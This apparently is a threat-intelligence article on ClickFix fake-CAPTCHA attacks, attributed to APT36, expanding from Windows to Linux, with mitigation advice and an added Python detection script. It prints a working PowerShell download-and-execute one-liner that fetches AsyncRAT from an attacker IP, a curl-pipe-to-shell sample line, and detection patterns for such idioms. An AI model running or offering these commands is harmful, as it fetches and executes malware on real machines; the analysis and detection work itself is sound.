
A new wave of ClickFix attacks has emerged, now targeting Linux systems alongside Windows, marking a significant shift in attacker tactics. Security researchers have observed Pakistan-linked APT36 impersonating India’s Ministry of Defence to distribute malicious shell scripts through fake CAPTCHA pages [1]. While current payloads appear non-malicious, this development signals threat actors are actively testing Linux infection vectors for future campaigns.
ClickFix Attack Methodology
The ClickFix technique relies on social engineering to trick users into executing malicious commands copied to their clipboard. Attackers typically lure victims to compromised websites hosting fake error messages or CAPTCHA verification pages. When users attempt to resolve these fake issues, they’re instructed to paste and run commands in their terminal or PowerShell [2].
Recent campaigns have employed several variations of this attack. One method involves the `mapeal.sh` shell script being copied to Linux users’ clipboards, while Windows targets receive PowerShell commands fetching AsyncRAT from `138.199.161.141:8080` [1]. Another variant uses fake Cloudflare CAPTCHA pages hosted on domains like `overtimeforus.com/dow` to distribute MSI installers containing malware [2].
Technical Analysis of Linux Payloads
The Linux-targeting ClickFix attacks currently focus on reconnaissance rather than immediate compromise. The `mapeal.sh` script appears designed to test Linux system compatibility and gather basic system information. However, security analysts warn this likely represents preliminary testing before more destructive payloads are deployed [1].
Windows payloads show greater sophistication, with examples including PowerShell one-liners such as:

```powershell
'C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\PowerShell.exe' -w h -c '$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161.141:8080/$u|iex'
```

This command runs in a hidden window (`-w h`), derives the request path from the current Unix timestamp masked to a multiple of 16 seconds (`-band 0xfffffffffffffff0`), and pipes the response from `138.199.161.141:8080` into `Invoke-Expression` to fetch AsyncRAT, while attempting to evade detection through variable naming [2].
Sector-Specific Targeting
ClickFix attacks have impacted multiple industries with tailored approaches:
| Sector | Tactics | Payloads |
|---|---|---|
| Healthcare | Fake browser updates with “Fix It” buttons | Stealc, Rhadamanthys |
| Education | Compromised iClicker student portals | PowerShell malware |
| Government | Impersonation of defense ministries | Interlock RAT |
The healthcare sector has been particularly affected, with one campaign exfiltrating 1.5 TB of data from DaVita Inc. using Interlock ransomware [3].
Mitigation and Detection
Organizations can implement several defenses against ClickFix attacks:
- Disable clipboard access for web browsers via Group Policy
- Restrict PowerShell execution to `Restricted` mode
- Monitor for connections to known IOCs like `185.250.151.155`
- Educate users to never execute commands from untrusted sources

For Linux systems, additional precautions include implementing strict clipboard permissions and monitoring for suspicious shell script executions originating from browser activities [4].
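The following triage script is an added illustration (not code from the article or from any of the cited reports) of the detection logic behind the command analysis above and the monitoring advice in this section: it scores process command lines for ClickFix indicators and reproduces the timestamp masking to show why a URL-level IOC for this campaign rotates every 16 seconds. The events are constructed; only the `138.199.161.141:8080` and `185.250.151.155` IOCs and the `mapeal.sh` name come from the article, and `lure.example` is a placeholder host.

```python
import re

# Constructed process-creation events (not real telemetry). The C2 host and
# mapeal.sh name come from the article; lure.example is a placeholder.
SAMPLE_EVENTS = [
    {"image": "PowerShell.exe", "cmdline": "PowerShell.exe -w h -c $u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm 138.199.161.141:8080/$u|iex"},
    {"image": "bash", "cmdline": "bash -c curl -s http://lure.example/mapeal.sh | sh"},
    {"image": "PowerShell.exe", "cmdline": "PowerShell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"image": "bash", "cmdline": "bash -c ls -la /var/log"},
]

KNOWN_C2 = {"138.199.161.141:8080", "185.250.151.155"}  # IOCs named in the article

# Download-and-execute idioms used by ClickFix lures on either platform.
DOWNLOAD_EXEC = [
    re.compile(r"\b(irm|iwr|invoke-restmethod|invoke-webrequest)\b.*\|\s*(iex|invoke-expression)\b", re.I),
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b", re.I),
]
HIDDEN_WINDOW = re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)


def timestamp_path(unix_seconds):
    """Reproduce the path the PowerShell lure requests: the Unix time with its
    low four bits cleared, so the path only changes every 16 seconds. A
    URL-level IOC therefore expires almost at once; match on host:port instead."""
    return unix_seconds & 0xFFFFFFFFFFFFFFF0


def score_event(event):
    """Return the list of ClickFix indicators present in one command line."""
    cmd = event["cmdline"]
    reasons = []
    if any(p.search(cmd) for p in DOWNLOAD_EXEC):
        reasons.append("download-and-execute pipeline")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden console window")
    reasons.extend(f"known IOC {ioc}" for ioc in sorted(KNOWN_C2) if ioc in cmd)
    return reasons


def triage(events):
    """Keep events with at least one indicator, strongest first."""
    hits = [(e["cmdline"], score_event(e)) for e in events]
    return sorted([h for h in hits if h[1]], key=lambda h: -len(h[1]))


if __name__ == "__main__":
    for cmdline, reasons in triage(SAMPLE_EVENTS):
        print(f"{len(reasons)} indicator(s): {', '.join(reasons)}\n  {cmdline}")
```

The `-File` backup job and the plain `ls` are kept as benign controls so the rules can be checked for false positives before being deployed against real Sysmon or auditd telemetry.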
Conclusion
The expansion of ClickFix attacks to Linux systems represents an escalation in cross-platform threat activity. While current Linux payloads remain limited, their existence demonstrates threat actors’ growing interest in compromising diverse operating environments. Organizations should prepare for more sophisticated Linux-targeting variants by implementing the recommended mitigations and maintaining vigilance against social engineering tactics.
References
1. “Hackers now testing ClickFix attacks against Linux targets,” BleepingComputer, 2025. [Online]. Available: https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets
2. “State-sponsored hackers embrace ClickFix social engineering tactic,” BleepingComputer, 2025. [Online]. Available: https://www.bleepingcomputer.com/news/security/state-sponsored-hackers-embrace-clickfix-social-engineering-tactic
3. “Interlock ransomware gang pushes fake IT tools in ClickFix attacks,” BleepingComputer, 2025. [Online]. Available: https://www.bleepingcomputer.com/news/security/interlock-ransomware-gang-pushes-fake-it-tools-in-clickfix-attacks
4. “New ClickFix attack imitates Ministry of Defence website,” GBHackers, 2025. [Online]. Available: https://gbhackers.com/new-clickfix-attack-imitates-ministry-of-defence-website